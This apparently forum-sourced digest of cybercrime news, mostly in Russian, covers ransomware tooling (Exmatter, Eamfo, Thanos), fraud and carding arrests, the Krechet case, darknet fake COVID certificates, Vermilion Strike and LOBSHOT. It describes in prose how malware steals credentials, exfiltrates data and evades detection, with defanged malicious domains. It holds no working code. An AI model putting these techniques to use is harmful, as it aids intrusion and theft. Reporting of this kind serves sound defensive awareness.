Использование Exmatter позволяет вымогателям незаметно выкачивать из корпоративной сети данные — до запуска шифрования. Украденная информация тоже становится средством шантажа: ее грозят опубликовать в случае неуплаты выкупа за ключ расшифровки.
Создатели новой версии Exmatter сократили список расширений для поиска файлов до 19 позиций (.pdf, .doc, .docx, .xls, .xlsx, .png, .jpg, .jpeg, .txt, .bmp, .rdp, .txt, .sql, .msg, .pst, .zip, .rtf, .ipt, .dwg). Из других нововведений аналитики отметили следующие:
вывод данных через FTP, в дополнение к SFTP и WebDav;
создание отчета со списком всех обработанных файлов;
порча файлов при обработке (функциональность пока отключена);
самоудаление при отсутствии корпоративного окружения (за пределами домена Active Directory);
снятие с поддержки Socks5;
развертывание с помощью групповых политик Windows.
Анализ также показал, что вредоносный код в значительной мере переписан — даже сохранившиеся функции реализованы заново и по-иному. По всей видимости, вирусописатели надеялись таким образом повысить вероятность обхода средств обнаружения.
В конце августа была зафиксирована атака BlackCat с использованием Eamfo (эксперты сочли ее делом рук одного из аффилиатов RaaS-сервиса). Этот инфостилер имеет узкую специализацию: крадет учетные данные только из бэкапов Veeam.
С этой целью он подключается к базе данных SQL, которую использует софт для резервного копирования, и посылает особый запрос. Полученные данные предоставляются оператору уже в расшифрованном виде, чтобы тот мог использовать их для своих нужд — повышения привилегий, дальнейшего продвижения по сети.
По данным экспертов, Eamfo появился на интернет-арене не позднее августа прошлого года и был также замечен в атаках других шифровальщиков — Yanluowang, LockBit.
Авторы той же BlackCat-атаки с инфостилером применили еще один инструмент — сканер GMER, нацеленный на поиск руткитов. Злоумышленникам он помог принудительно завершить неугодные процессы в скомпрометированных системах.
• Source: [https://symantec-enterprise-blogs.s...intelligence/noberus- blackcat-ransomware-ttps](https://symantec-enterprise- blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps)
Французские правоохранительные органы воспользовались исследованием, проведенным криптовалютным аналитиком под псевдонимом ZachXBT, чтобы арестовать пятерых подозреваемых в мошенничестве с NFT.
Как сообщает агентство France Presse, пятеро подозреваемых в возрасте от 25 до 29 лет создали сайт, на котором предлагалось анимировать статичные картинки NFT из коллекций Bored Ape Yacht Club (BAYC) и Mutant Ape Yacht Club (MAYC). Если доверчивый владелец коллекционных токенов подключал свой кошелек, то терял NFT.
Мошенническая схема работала с конца 2021 года по начало 2022 года. Сейчас подозреваемым предъявлены обвинения в мошенничестве в составе организованной преступной группы и сокрытии преступлений. Прокуроры попросили суд заключить под стражу двоих подозреваемых – предполагается, что они являются лидерами группы.
Интересно, что для ареста полиция использовала данные анонимного криптовалютного аналитика ZachXBT, который провел расследование после «запросов сообщества владельцев токенов BAYC». В аккаунте ZachXBT появилось сообщение, что он очень рад аресту преступников.
«Мошенники пытались скрыть свои следы, используя миксер Tornado Cash. Однако они были не слишком осторожны при выводе средств с миксера», – написал аналитик.
Изи мани. Покупатель будет в большой выгоде, а сам должник списать эту сумму никак не сможет. От куда взялся такой долг, как и отказ продавца от такого богатства — не понятно. Инфоцыгане выходят на новый уровень.
Продам долг физического лица 426 млн - субсидиарная ответственность ( долг не списывается в банкротстве). Долг просужен, исполнительное производство не возбуждалось, исполнительный лист предъявлен в банк в декабре 2022 года.
Банк перечисляет денежные средства удерживаемые из пенсии должника в размере 17200 руб ежемесячно. Второй кредитор - Налоговая, сумма требования 3.2 млн ( менее 1% от общей суммы требований к должнику). Должник проживает в Москве ( адрес по запросу), стоимость аналогичных квартир в доме проживания должника от 13 млн. В перспективе получите право на квартиру, родственники не будут вступать в наследство т.к. в этом случае будут отвечать по долгам должника. О другом имуществе должника информацией не располагаю.
Помощь во взыскании не рассматриваю, только продажа.
Без торга.Click to expand...
The man suspected of being responsible for the largest data leak in Brazil was arrested this Friday, March 19th, in Uberlândia, Minas Gerais, during Operation Deepwater, of the Federal Police (PF). The action investigates the obtaining, disclosure and commercialization of data of Brazilians, including several authorities.
The investigations found that, last January, through the Internet, confidential data of individuals and companies – such as the Individual Taxpayer Registry (CPF) and the Corporate Taxpayer Registry (CNPJ), full names and addresses – were illicitly made available.
Vanda the God’s real name is reportedly [Marcos Roberto Correia da Silva, ](https://3yhf3olqfvwf26pjsggqfxiih4--g1-globo- com.translate.goog/mg/triangulo-mineiro/noticia/2021/03/19/suspeito-do-maior- vazamento-de-dados-do-brasil-e-preso-em-uberlandia.ghtml)he is 24 years old, and that he is allegedly responsible for disseminating information on 223 million Brazilians. “JustBR,” who is the person who listed the data on RaidForums, seems to be a second individual.
The second hacker, Yuri Batista Novaes, known as "JustBR", was arrested in flagrante delicto in Petrolina (PE) for illegal possession of a weapon and, at his house, the Federal Police seized 4 terabytes of data, which will now be investigated. According to the investigation, Novaes participated in obtaining and disseminating information from 223 million Brazilians.
Как стало известно “Ъ”, ФСБ проводит проверку в отношении бизнесмена 51-летнего Николая Кречета. Десять лет назад господину Кречету удалось скрыться за границей от Сбербанка, который пытался взыскать с него полмиллиарда рублей. В США эмигранта обвинили в аферах с банковскими картами на сумму около $2 млн и едва не посадили на 20 лет, но перед вынесением приговора он опять сбежал — на этот раз в Россию, где чекисты проверяют его на предмет возможного сотрудничества с американской спецслужбой.
В 90-х фирма Nak Microware Николая Кречета являлась официальным дилером Hewlett-Packard, Canon, Xerox, Sony, Fuji. Однако известность он получил в 2013 году после выхода на профильном ресурсе banki.ru статьи «Их разыскивает Сбербанк». В ней сообщалось, что основатель Nak Microware не вернул банку кредиты на 507 млн руб. и банк гарантирует награду в 3 млн руб. тому, кто поможет разыскать активы должника.
Банки.ру, 19.07.2013, "Их разыскивает Сбербанк": Как стало известно Банки.ру, Сбербанк ищет компании, которые помогли бы обнаружить ему имущество двух своих должников — опальных коммерсантов за рубежом. На эти цели кредитная организация не пожалеет 3 млн рублей. Опрошенные эксперты указывают, что эту сумму с лихвой удастся окупить, если нанятое агентство сможет отыскать зарубежное имущество, на которое можно будет обратить взыскание.
Судя по документации Сбербанка, которая имеется в распоряжении Банки.ру, «зеленый слон» не на шутку заинтересован в возврате долгов от двух своих клиентов — Николая Кречета и Владимира Некрасова. «Сбер» просит предоставить по результатам расследования точный адрес местоположения, а также вид имущества, его идентификационный номер и документы, подтверждающие имущественное положение должника на территории иностранных государств.
В Сбербанке на запрос Банки.ру не ответили. Однако, как удалось выяснить порталу, оба клиента были крупными заемщиками кредитной организации, более того — известными бизнесменами, впоследствии обвиненными в уклонении от уплаты налогов в особо крупных размерах.
Николай Кречет в 2000-х годах был известен как президент группы компаний Nak Microware, занимающейся торговлей компьютерными комплектующими и расходными материалами и являющейся в том числе дистрибьютором компании Canon. В Интернете можно найти даже паспортные данные Николая Кречета и информацию о том, что с 2010 года он числится в федеральном розыске. Более того, существует специальный сайт, посвященный коммерсанту, на котором он обвиняется в хищении средств из федерального бюджета через подконтрольные ему компании, а также в злостном уклонении от уплаты налогов. Называется также сумма не возвращенных Кречетом кредитов банкам в размере 500 млн долларов. — Врезка К.ру
Click to expand...
Тремя годами позже поиски имущества закончились, поскольку арбитраж признал Николая Кречета банкротом. Бизнесмен, впрочем, еще в 2011 году сбежал от кредиторов и правоохранителей в США.
Там господин Кречет приобретал технику Apple и подарочные карты сетевых универсамов Walmart и Target в офшорном штате Делавэр, а затем продавал их оптовикам в Нью-Джерси, где он жил, с небольшой наценкой. Это позволяло ему ежемесячно получать порядка $10 тыс.
Летом 2015 года Николая Кречета задержали. При избрании меры пресечения в окружном суде Нью-Джерси спецагент ФБР Эрин Брандт заявила, что считает господина Кречета участником преступной группы. Его предполагаемые сообщники, получая доступ к электронным базам банковских клиентов, изготавливали клоны их дебетовых карт и расплачивались ими за оргтехнику либо подарочные карты, на которые затем приобретались те же гаджеты. Роль же господина Кречета, по версии следствия, сводилась к реализации техники.
По данным ФБР, синдикат изготовил более 25 тыс. поддельных карт, а через одного только «скупщика краденого» Кречета прошло товаров на $2 млн.
При этом агент Брандт утверждала, что киберсиндикат контролируется «Братским кругом» — организацией, объединяющей преступников из стран бывшего СССР, а выйти на господина Кречета, по ее словам, удалось благодаря показаниям секретного агента.
Сам Николай Кречет пытался объяснить, что понятия не имел, откуда брал оргтехнику и подарочные карты его поставщик — эмигрант из Одессы Эдгар Рейн, оказавшийся агентом.
В тюрьме Old Essex County Jail, как рассказал “Ъ” господин Кречет, его соседями оказались в основном негры и латиноамериканцы, большую часть времени проводившие во внутреннем дворе тюрьмы с установленными там баскетбольным кольцом и столиком для игры в карты — его бизнесмен стал использовать для проведения шахматных турниров. Своих сокамерников он привлекал ставкой $50 к $1, вскоре став одним из самых состоятельных сидельцев.
Получить постоянное место за единственным компьютером Николаю Кречету тоже помогли его соседи. По словам экс-арестанта, этот компьютер не был подключен к интернету, а прочитать на нем можно было только свод законов Нью-Джерси, однако сидельцы использовали его для просмотра записанных на флешки порнофильмов. Господин Кречет, по его словам, написал «совершенно роскошную» жалобу в защиту афроамериканского «авторитета» и стал после этого штатным защитником заключенных.
К лету 2017 года отсидевшего в тюрьме два года господина Кречета перевели под домашний арест, а в 2018 году суд признал его виновным в скупке и продаже краденого. По мнению самого бизнесмена, прямых доказательств не нашлось, но присяжных впечатлили «страшилки» ФБР про русскую кибермафию.
Обвиняемому грозил 20-летний срок, но в декабре, накануне приговора, господин Кречет по совету своего российского защитника Юрия Кондратьева, считавшего его уголовное преследование политическим, покинул США.
День побега он приурочил к отъезду в Португалию своего приятеля, которому перед вылетом отдал свой мобильник (позднее ФБР сообщило, что Николай Кречет мог вылететь из Бостона в Лиссабон). Разрезав ремешок электронного браслета, бизнесмен забросил устройство в кузов припаркованного возле придорожного кафе трейлера и только после этого отправился в путь сам.
На рейсовых автобусах и попутках он пересек всю территорию США, а в районе Сан-Диего перешел границу и двинулся дальше на юг. Господин Кречет проехал Мексику, Гватемалу, Гондурас и, только оказавшись в Никарагуа, как пояснил сам беглец, «перестал опасаться выдачи».
Там, заручившись поддержкой российского консульства в Манагуа, господин Кречет в августе 2020 года вернулся на родину. Однако деньги, как и раньше, он зарабатывал в США, издавая брошюры с текстами американских законов и распространяя их через Amazon. Эта продукция, по словам господина Кречета, пользуется большим спросом в тюрьмах, где нет интернета.
Очередные проблемы у Николая Кречета возникли весной этого года, после того как он взял к себе в штат помощницу — бывшую сотрудницу силовой структуры. По версии господина Кречета, его секретарша решила навести справки о своем работодателе и выяснила, что тот разыскивается ФБР. (fbi.gov/wanted/wcc/nikolay-almazov-krechet)
[slavicsac.com, 10.02.2019, "ФБР объявило в розыск российского гражданина из Коннектикута"](https://www.slavicsac.com/2019/02/10/nikolay-almazov- krechet/): Федеральным бюро расследований объявлен в розыск российский гражданин Николай Кречет 1970 года рождения, проживавший в штате Коннектикут. В мае 2018 года он был признан виновным в торговле краденым и выпущен под залог в ожидании приговора. 10 декабря 2018 года, за день до назначенного заседания суда, он скрылся от правосудия, отправив в федеральную прокуратуру электронное письмо с объяснениями.
Предположительно Кречет покинул страну, вылетев из Бостона (штат Массачусетс) в Португалию, а оттуда в Россию. Федеральным окружным судом Нью-Джерси был выдан ордер на его арест. Всех имеющих какую-либо информацию о местонахождении Николая Кречета просят обратиться в местное отделение ФБР или в ближайшее посольство США.
С 2014 по 2015 год Кречет и его сообщники занимались перепродажей краденых товаров и обналичиванием краденых кредитных карт и подарочных сертификатов. Оборот преступной группы составил несколько миллионов долларов. — Врезка К.ру
Click to expand...
Женщина дистанционно связалась с агентом спецслужбы, представила ему досье на господина Кречета и получила за это $3 тыс. Их сотрудничество, впрочем, быстро пресекли сотрудники ФСБ.
Интересно, что вначале секретаря и ее начальника чекисты заподозрили в госизмене. Во всяком случае, в постановлении об обыске квартиры Николая Кречета сказано, что он проводится в рамках проверки хозяина на возможную причастность к преступлению, предусмотренному соответствующей ст. 275 УК РФ.
Несмотря на то что проверка еще продолжается, сотрудники ФСБ уже очевидно пришли к выводу о том, что господин Кречет Родине не изменял, а деятельность его помощницы если и могла причинить вред, то конкретному гражданину России, а не всей стране. Во всяком случае, предпринимателю, который прошел детектор лжи, уже вернули изъятые у него паспорт, ноутбук и мобильный телефон.
itweek.ru, 14.11.2000, "Мы говорим Кречет, подразумеваем NAK Microware": 1 ноября компания NAK Microware (www.nak.ru) с размахом отметила день рождения не только самой фирмы, но и ее основателя и руководителя Николая Кречета, которому исполнилось ровно 30 лет. Празднование проходило на территории московского ипподрома, причем не только в уютном и в изобилии увешанном воздушными шариками ресторане Club Royale, но и на беговых дорожках, где трудолюбивые пони без устали катали по кругу многочисленных вендоров, дилеров и родственников виновника двойного торжества.
В адрес компании и лично г-на Кречета прозвучало немало теплых слов, а среди многочисленных подарков был и такой: мемориальная доска для офиса в Лебяжьем переулке с надписью: “В этом доме с 1 ноября 1994 г. работает и иногда живет выдающийся российский бизнесмен, человек слова, любимец удачи и женщин Николай Кречет”. Закончилось празднование далеко за полночь. “Безлошадных” гостей развозили по домам на машинах — сразу видно, что к клиентам NAK относится заботливо и уважительно. — Врезка К.ру[/QUOTE]
Click to expand...
Американец, обустроивший под кардинг-лабораторию собственный трейлер, получил 7,5 года
Житель американского Сиэтла (штат Вашингтон) приговорен федеральным судом к 7,5 года тюремного заключения за электронное мошенничество и кражу персональных данных при отягчающих обстоятельствах. Как уточняет ABC Local News 8, решения суда 43-летний Райан Тичи (Ryan Tichy) ждал больше двух лет.
Согласно данным следствия, с мая 2018 года по ноябрь 2020-го мошенник приобрел ID десятков американцев, использовав эти данные для создания поддельных документов, удостоверяющих личность, открытия кредитных счетов и получения кредитов, а также угона уже существующих счетов. Известно, что купленные Тичи персональные сведения включали имена, номера социального страхования, даты рождения и номера счетов. После этого мошенник создавал поддельные водительские права, используя свою фотографию с именами жертв. На полученные деньги он совершал покупки в штатах Вашингтон, Айдахо, Орегон и Невада.
Что любопытно, всю свою теневую работу Тичи вел из трейлера, купленного им также от имени другого человека. В ходе обыска, который был произведен еще в декабре 2020 года, полицейские обнаружили в самодельной лаборатории компьютеры и принтеры для создания и печати поддельных удостоверений личности и дебетовых и кредитных карт, бланки для водительских удостоверений, устройство для тиснения, перфоратор для карт, а также фейковые водительские удостоверения на разных стадиях готовности и поддельные кредитные карты.
При этом Тичи незадолго до начала своей преступной деятельности освободился из тюрьмы, также отбыв срок за мошенничество, который был для него вторым. Он должен был носить датчик на ноге в соответствии с правилами федерального надзора, но срезал его, чтобы полиция не могла отслеживать перемещения кардера.
• Source: justice[.]gov/usao-id/pr/washington-man-sentenced-90-months- identity-theft-scheme-spanning-idaho-and-several
• Source: [https://localnews8.com/news/crime-t...me-spanning-idaho-and- several-western-states/](https://localnews8.com/news/crime- tracker/2023/03/16/man-sentenced-to-90-months-for-identity-theft-scheme- spanning-idaho-and-several-western-states/)
Найти таинственных майнеров до сих пор не удалось
В Москве неизвестные подключились к трансформаторной подстанции на Рязанском проспекте и использовали её для добычи криптовалюты. Об этом сообщает телеграм-канал Baza.
По данным канала, майнеры подключили своё оборудование к подстанции ещё осенью прошлого года и работали до февраля 2023 года. За несколько месяцев они потратили электричество на 6,6 миллиона кВт.ч, что эквивалентно 33,1 миллиону рублей.
Когда в «Россетях» обнаружили аномальные расходы электричества, они обратились в полицию. По факту хищения энергии возбуждено уголовное дело по статье 165 УК РФ («Причинение имущественного ущерба путём обмана или злоупотребления доверием»). Однако пока не удалось выйти на след злоумышленников.
Он разработал и сдавал в аренду киберпреступникам программы-вымогатели Jigsaw
и Thanos.
Министерство юстиции США заявило, что Мойзес Луис Загала Гонсалес (Zagala), 55-летний кардиолог с французским и венесуэльским гражданством, проживающий в Сьюдад-Боливаре, Венесуэла, разработал и сдал в аренду киберпреступникам программы-вымогатели Jigsaw и Thanos.
Злоумышленник покупал вредоносное ПО и делился прибылью с Zagala после выкупа жертв по всему миру. Zagala (Nosophoros, Aesculapius, Nebuchadnezzar) также предлагал свою поддержку киберпреступнику.
«Как утверждается, врач лечил пациентов, а также создал и назвал свой киберинструмент After Death, извлек выгоду из глобальной экосистемы вредоносных программ, в которой он продавал инструменты для проведения атак с использованием программ-вымогателей, обучал злоумышленников вымогать деньги у жертвы, а затем хвастался успешными атаками, в том числе злоумышленниками, связанными с правительство Ирана», - заявил прокурор США Бреон Пис.
«Zagala не только создавал и продавал хакерам программы-вымогатели, но и обучал их использованию», - добавил помощник главного директора Дрисколл .
Программа-вымогатель Jigsaw включает в себя счетчик Судного дня (Doomsday), удаляющий определенное количество файлов с дисков жертв каждый час до оплаты выкупа. После каждого сброса количество удаляемых файлов увеличивается. С осени 2021 года активность Jigsaw была низкой, и вскоре Emsisoft выпустили дешифратор Jigsaw .
Thanos является RaaS программой, которая рекламируется на русскоязычных хакерских форумах. Вредоносное ПО позволяет аффилированным лицам настраивать свои собственные программы-вымогатели с помощью конструктора от разработчика. Параллельно с управлением партнёрской программой для сбора прибыли с киберпреступников, хакер также регистрировал вредоносное ПО Thanos с помощью сервера лицензирования, расположенного в Шарлотте, Северная Каролина. Thanos перестал появляться в сообщениях о взломе ID-Ransomware c февраля 2022 года, а в июне 2021 года на VirusTotal произошла утечка конструктора вредоносных программ Ransomware Builder.

Некоторые образцы вредоносного ПО Thanos ранее были помечены как Prometheus, Haron или Hakbit из-за различных форматов шифрования, используемых аффилированными лицами. Однако, группа Insikt из Recorded Future обнаружила, что это одна и та же программа.
«Основываясь на сходстве кода, повторном использовании строк и базовой функциональности, Insikt Group с высокой степенью уверенности оценивает, что образцы программы Hakbit созданы с использованием конструктора Thanos Ransomware Builder, разработанного Nosophoros», - говорится в сообщении Insikt Group.

По словам Министерства юстиции США, Zagala публично обсуждал использование его
инструментов «клиентами», «в том числе путем ссылки на новостную статью об
использовании хакерской группой, спонсируемой иранским государством, программы
Thanos для атак на израильские компании» ,
согласно отчету ClearSky об операции Operation Quicksand .
В мае 2022 года сотрудники правоохранительных органов указали на причастность Zagala к программе Thanos после допроса одного из его родственников, собравшего часть доходов киберпреступника через PayPal аккаунт. Родственник также показал контактную информацию со своего телефона, которую обвиняемый использовал для регистрации некоторых программ Thanos. Хакеру грозит до 5 лет тюремного заключения за попытку компьютерного вторжения и 5 лет тюрьмы за сговор с целью совершения кибервзломов.
source:
justice[.]gov/usao-edny/pr/hacker-and-ransomware-designer-charged-use-and-
sale-ransomware-and-profit-sharing
emsisoft.com/ransomware-decryption-tools/jigsaw
id-ransomware.malwarehunterteam.com
clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf
Ранее мы уже писали о том, что в даркнете появились объявления о продаже трех видов запатентованных вакцин от коронавируса — Pfizer/BioNTech, AstraZeneca и Moderna, а также некоторых еще не запатентованных.
Теперь аналитики Check Point заметили новый тренд в даркнете – продажу поддельных сертификатов о вакцинации от COVID-19 и справок об отрицательном тесте на коронавирус.
Также исследователи отмечают рост количество объявлений о продаже вакцин за последние три месяца на 300%: преступники предлагают купить вакцины Johnson & Johnson, AstraZeneca, «Спутник V» и SinoPharm от 500 долларов за дозу. Сейчас таких объявлений насчитывается около 1200 — это в три раза больше, чем в январе текущего года.
Поддельный сертификат о вакцинации, якобы выданный в центре по контролю и профилактике заболеваний США (CDC), стоит 200 долларов за штуку. Оплата возможна только в биткоинах, чтобы продавца было нельзя было отследить.
 
Исследователи Check Point Research написали продавцу, чтобы понять, как происходит продажа, и выяснить как можно больше подробностей о доставке, цене и подлинности сертификата. Отвечая на вопросы, продавец заверил исследователей, что продал уже множество сертификатов другим людям, и никаких проблем с ними не возникало. Все, что требовалось: написать нужные имена и даты для изготовления сертификатов и заплатить 200 долларов. Ниже можно увидеть скриншот переписки.

Также есть возможность приобрести поддельную справку об отрицательном тесте на COVID-19 по акции «три по цене двух» или за 25 долларов изготовить ее самостоятельно всего за полчаса.

Пользователю достаточно внести свои данные в удобную форму и заплатить деньги. Через полчаса готовая справка приходит на указанный пользователем email. Ниже можно увидеть шаблон для изготовления такой справки.

«В последнее время в даркнете появилось множество предложений, связанных с вакцинами. Три месяца назад, когда мы впервые решили исследовать этот вопрос, нам удалось найти всего несколько сотен объявлений о продаже вакцин Moderna и Pfizer. Сегодня же в даркнете доступны все существующие виды вакцин. Еще одна новая тенденция — продажа поддельных сертификатов для выезда за границу: теперь хакеры предлагают приобрести не только вакцины, но и все документы, связанные с коронавирусом и вакцинацией, — рассказывает Одед Вануну, глава Check Point Software Technologies по исследованию уязвимостей продуктов. — Злоумышленники стремятся заработать не только на спросе на вакцины, но и на стремлении людей избежать вакцинации. Необходимо осознавать все риски, связанные с покупкой вакцин у неофициальных поставщиков и заказа поддельных документов. Хакеры явно заинтересованы в том, чтобы пользователи предоставили им как можно больше личной информации. Более того, не привившиеся люди, которые стремятся получить поддельные справки об отрицательном результате теста на коронавирус, могут быть заражены. Покупая справки, они мешают бороться с болезнью. Я также настоятельно призываю пользователей не выкладывать в соцсети фотографии настоящих сертификатов о вакцинации и справок с отрицательным результатом теста, поскольку они могут оказаться в руках злоумышленников. Также я уверен, что в ближайшее время в даркнете будет появляться еще больше активности, связанной с коронавирусом и вакцинацией».
Click to expand...
Также в даркнете по-прежнему предлагают купить самые разные виды вакцин от коронавируса, цены начинаются от 500 долларов за дозу. Чаще всего предлагают купить:

Источник: xakep.ru/2021/03/26/covid-darkweb/
Эксперты компании Intezer Lab [обнаружили Vermilion Strike](https://www.intezer.com/blog/malware-analysis/vermilionstrike- reimplementation-cobaltstrike) — адаптированную для Linux вариацию Cobalt Strike Beacon, которую хакеры уже используют в атаках против организаций по всему миру.
Cobalt Strike — это легитимный коммерческий инструмент, созданный для пентестеров и red team и ориентированный на эксплуатацию и постэксплуатацию. К сожалению, он давно любим хакерами, начиная от правительственных APT- группировок и заканчивая операторами шифровальщиков.
Хотя он недоступен для рядовых пользователей и полная версия оценивается примерно в 3500 долларов за установку, злоумышленники все равно находят способы его использовать (к примеру, полагаются на старые, пиратские, взломанные и незарегистрированные версии). Так, по информации [Intel 471](https://intel471.com/blog/cobalt-strike-cybercriminals-trickbot-qbot- hancitor), [Proofpoint](https://www.proofpoint.com/us/blog/threat- insight/cobalt-strike-favorite-tool-apt-crimeware) и [Recorded Future](https://www.recordedfuture.com/2020-adversary-infrastructure- report/?__hstc=156209188.3ef598c77f0fcaaf2d58045f9a8ece00.1625723961733.1631618124238.1631621643973.152&__hssc=156209188.5.1631621643973&__hsfp=2824465531), за последние годы Cobalt Strike не раз был взломан и его не раз пиратили. Также исследователи подсчитали, что в 2020 году Cobalt Strike и Metasploit присутствовали на 25% управляющих серверов различных хак-групп.
Обычно преступники используют Cobalt Strike для постэксплуатации, после развертывания так называемых «маяков» (beacon), которые обеспечивают устойчивый удаленный доступ к скомпрометированным устройствам. Используя маяки, хакеры могут получить доступ к взломанным системам для последующего сбора данных или развертывания дополнительной малвари.
Однако, с точки зрения преступников, у Cobalt Strike всегда был один недостаток. Дело в том, что он поддерживает только Windows, но не Linux. Но, судя по отчету Intezer Lab, теперь это изменилось.
Впервые исследователи заметили новую реализацию маяка в августе текущего года и дали этому явлению название Vermilion Strike. В компании подчеркивают, что ELF-бинарник Cobalt Strike пока не обнаруживается антивирусными решениями.
[](https://xakep.ru/wp- content/uploads/2021/09/358979/pasted-image-0.png)
По сути, Vermilion Strike использует тот же формат конфигурации, что и маяк для Windows, он может взаимодействовать со всеми серверами Cobalt Strike, однако не использует код Cobalt Strike. Хуже того, эксперты считают, что тот же разработчик переписал оригинальную версию маяка для Windows, чтобы лучше избегать обнаружения.
[](https://xakep.ru/wp- content/uploads/2021/09/358979/Configuration-decryption-function- comparison.png)
После развертывания в скомпрометированной системе Vermilion Strike способен выполнять следующие задачи:
Используя телеметрию, предоставленную McAfee Enterprise ATR, исследователи выяснили, что Vermilion Strike используется для атак с августа 2021 года. Преступники нацелены на самые разные компании и организации, от телекомов и государственных учреждений до ИТ-компаний, финансовых учреждений и консалтинговых фирм по всему миру.
«Изощренность этих злоумышленников, их намерение заниматься шпионажем, а также тот факт, что этот код ранее не использовался в других атаках и был нацелен на конкретные организации, заставляет нас предположить, что эта угроза была создана опытным злоумышленником», — говорят аналитики Intezer Lab.
Click to expand...
Новости Беларуси. 1 500 фактов хищения денежных средств на сумму 2,5 миллиона рублей. Крупную хакерскую группировку разоблачили сотрудники СК и МВД Беларуси, сообщили в программе Новости «24 часа» на СТВ.
По версии следствия, киберпреступники при помощи вредоносного программного обеспечения получали доступ к карт-счетам пользователей одной из популярных белорусских торговых интернет-площадок. Задержаны 16 человек, восемь из них под стражей. Некоторые фигуранты дела – несовершеннолетние. Один их таких начал свою деятельность в 13 лет, он разрабатывал вирусный софт для преступников. Было установлено, что более 1 300 участников группы физически находились не только в Беларуси, но и в России, Украине, Казахстане, Польше и других странах.
Андрей Мотолько, начальник главного управления цифрового развития предварительного следствия Следственного комитета Беларуси:
Следователями были разработаны специальные методики аналитики, с помощью которой нам удалось детально изучить структуру данной скан-группы, детально проанализировать механизм совершаемых преступлений. Более того, модифицировать те программные продукты, которые использовали преступники, дабы сделать совершение преступления невозможным.
Андрей Ковалев, начальник главного управления по противодействию киберпреступности Министерства внутренних дел Беларуси:
Это хорошо спланированная организованная группа. Это не просто голос посредством связи либо телефонного звонка, где представлялись работником банка, сотрудником правоохранительной системы. Либо просто на одной из торговых площадок пытались, грубо говоря, развести либо вывести на определенную модель поведения.
В правоохранительных ведомствах подчеркнули, что работа органов по этому делу продолжается, и заверили, что интернет не анонимен, и личности всех преступников рано или поздно раскроют. Их ждет серьезная уголовная ответственность.
• Source: [https://ctv.by/hishcheniya-na-summu...irovku-hakerov-razoblachili- sk-i-mvd-belarusi](https://ctv.by/hishcheniya-na-summu-25-mln-rubley-krupnuyu- gruppirovku-hakerov-razoblachili-sk-i-mvd-belarusi)
• Video:
Новая вредоносная программа LOBSHOT распространяется через рекламный механизм Google и позволяет операторам незаметно захватывать устройства, работающие на операционной системе Windows.
В последнее время исследователи не раз предупреждали об интересе киберпреступников к распространению вредоносов через рекламу в Google. Например, именно так пользователям выдавался зловред под видом GIMP.
Злоумышленники маскируют фишинговые и вредоносные сайты под ресурсы 7-ZIP, VLC, OBS, Notepad++, CCleaner, TradingView, Rufus и др. Желая получить легитимный софт, пользователи загружают на устройства трояны Gozi, RedLine, Vidar, Cobalt Strike, SectoRAT и шифровальщик Royal.
[В отчёте Elastic Security Labs](https://www.elastic.co/security-labs/elastic- security-labs-discovers-lobshot-malware) специалисты указали на нового вредоноса — LOBSHOT, который также распространяется с помощью механизма Google Ads. На этот раз злоумышленники прикрылись софтом для удалённого администрирования AnyDesk, а на деле вели посетителя на фейковый сайт amydeecke[.]website.
Злонамеренный ресурс выдаёт пользователю файл MSI, выполняющий в системе PowerShell-команду и загружающий DLL с download-cdn[.]com.
«Мы выявили более 500 уникальных образцов LOBSHOT с июля 2022 года. Все они скомпилированы как 32-битные DLL или исполняемый файлы и весят между 93 и 124 КБ», — пишет команда Elastic Security Labs.
Сразу после запуска LOBSHOT проверяет, запущен ли в системе Microsoft Defender. Если антивирус активен, вредонос завершает свой процесс, чтобы избежать детектирования. В случае же, если Microsoft Defender не работает, LOBSHOT вносит изменения в реестр ОС и настраивается на автозапуск.
Далее зловред проверяет наличие одного из 32 Chrome-расширений для криптовалютных кошельков, 9 Edge-аддонов и 11 расширений для Firefox. После этого LOBSHOT запускает файл в директории C:\ProgramData.
Исследователи также выяснили, что вредонос располагает hVNC-модулем, позволяющим операторам незаметно подключаться к заражённому устройству удалённо.
У Rockstar Games праздники пройдут напряженными.
В канун Рождества стало известно о потенциальной утечке исходного кода популярной видеоигры Grand Theft Auto 5. Произошло это спустя год после атаки хакерской группы Lapsus$ на компанию Rockstar Games , в результате которой были украдены корпоративные данные.
Ссылки на скачивание исходного кода распространились несколькими способами: Discord, сайт в в даркнете и Telegram-канал, ранее использовавшийся хакерами для утечки данных Rockstar. В одном из Telegram-каналов, посвященных утечкам Grand Theft Auto, владелец канала по имени 'Phil' опубликовал ссылки на украденный исходный код, демонстрируя скриншот одной из папок.
Phil также выразил уважение хакеру Lapsus$ Ариону Куртаю, который ранее опубликовал пререлизные видео Grand Theft Auto 6 под псевдонимом 'teapotuberhacker'. Недавно Куртай был приговорен в Великобритании к неопределенному пребыванию в больнице за взлом Rockstar и Uber.
В 2022 году Rockstar Games была взломана членами группы Lapsus$, которые получили доступ к корпоративному серверу Slack и вики Confluence компании. Тогда хакеры заявили, что украли исходные коды и активы GTA 5 и GTA 6, включая тестовую сборку GTA 6, часть украденного контента была опубликована на форумах и в Telegram-канале. Также были опубликованы образцы исходного кода GTA 5 в качестве доказательства кражи данных.
Скриншот папки с исходным кодом GTA5
Группа исследователей кибербезопасности vx-underground сообщила, что они общались со злоумышленником в Discord, который заявил, что утечка исходного кода произошла раньше ожидаемого срока.
Хакер продемонстрировал vx-underground скриншоты утечки в качестве доказательств
Хотя специалисты издания BleepingComputer ознакомились с утечкой, которая, по всей видимости, является подлинным исходным кодом GTA 5, независимо проверить её подлинность не удалось. BleepingComputer связался с Rockstar по поводу утечки, но не получил ответа, вероятно, из-за праздников.
source: twitter.com/vxunderground/status/1739263588408164859
Индийская авиакомпания Air India сообщила, что один из ее поставщиков ПО допустил утечку данных, из-за чего были раскрыта личная информация 4,5 млн пассажиров, пользовавшихся услугами перевозчика.
Утечка произошла по вине швейцарской компании SITA, разрабатывающей систему бронирования для пассажиров, которая в настоящее время используется крупнейшим в мире альянсом авиакомпаний Star Alliance.
SITA сообщила о проблеме еще в марте текущего года, и известно, что утечка затронула как минимум десять крупных авиакомпаний, включая Malaysia Airlines, Singapore Airlines, Jeju Air, Air New Zealand, Polish Airlines, Finnair, Scandinavian Airlines, Cathay Pacific и Lufthansa. Однако подробностей о произошедшем по-прежнему очень мало, и ранее авиакомпании даже не могли сообщить, какие именно данные пассажиров были раскрыты из-за утечки.
